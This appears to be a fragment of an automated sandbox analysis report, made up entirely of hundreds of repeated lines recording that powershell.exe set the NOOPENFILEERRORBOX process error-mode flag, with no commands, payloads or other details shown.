                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
